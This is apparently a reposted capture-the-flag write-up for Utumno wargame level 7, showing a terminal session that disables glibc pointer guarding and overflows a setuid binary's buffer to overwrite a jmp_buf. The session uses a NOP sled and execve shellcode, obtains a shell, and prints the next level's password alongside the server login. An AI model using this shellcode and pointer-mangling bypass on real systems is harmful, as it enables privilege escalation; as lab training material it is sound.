utumno - 7
来源:互联网 发布:淘宝还可以买梦幻币吗 编辑:程序博客网 时间:2024/06/01 09:54
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250utumno7@178.79.134.250's password: totiquegaeutumno7@melinda:~$ mkdir /tmp/utu7utumno7@melinda:~$ cd /tmp/utu7utumno7@melinda:~$ export LD_POINTER_GUARD=0(LD_POINTER_GUARD(glibc since 2.4) Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default.Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved bysetjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attackerto hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)
# stack environment---------eip (rol eip, 0x09 ; rotation left 9bits)---------esp (rol esp, 0x09 ; rotation left 9bits)---------ebp---------edi---------esi---------ebx--------- jmp_buf(esp + 0x90)128B--------- buffer(esp + 0x10)#we use gdb to get the buffer address. it's 0xffffd420#rol 0xffffd420,0x9 == 0xffa841ff#we set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff
utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`^Z[1]+ Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ jobs -l[1]+ 27875 Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ kill -10 27875utumno7@melinda:/tmp/utu7$ fg/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`^Z[1]+ Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ kill -12 27875utumno7@melinda:/tmp/utu7$ fg/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`$ whoamiutumno8$ cat /etc/utumno_pass/utumno8jaeyeetiav$
ref[1]: http://hacktracking.blogspot.com/2013/06/utumno-wargame-level-7.html
0 0
- utumno - 7
- utumno - 0
- utumno - 1
- utumno - 2
- utumno - 3
- utumno - 4
- utumno - 5
- utumno - 6
- 170910 WarGames-Utumno(2)
- 170911 WarGames-Utumno(3)
- 170909 WarGames-Utumno(0-1)
- 7
- 7
- 7
- 7
- 7
- 7
- 7
- 常驻线程的创建--线程不死之谜
- 字符的一些操作 和 与之对应的宽字符的一些操作
- 栈的使用和模拟
- mysql “group by ”与"order by"的研究--分类中最新的内容
- 初学c/c++出现的一些易混淆概念
- utumno - 7
- MySql数据引擎简介与选择方法
- 《Android源码设计模式》读书笔记 (14) 第14章 迭代器模式
- Java基础经典总结
- [LeetCode]130. Surrounded Regions
- leetcode 37. Sudoku Solver
- iosiPhone屏幕尺寸、分辨率及适配
- 神经网络入门基础知识 neural networks basics
- WinCE 下怎么获取路由表和增加路由?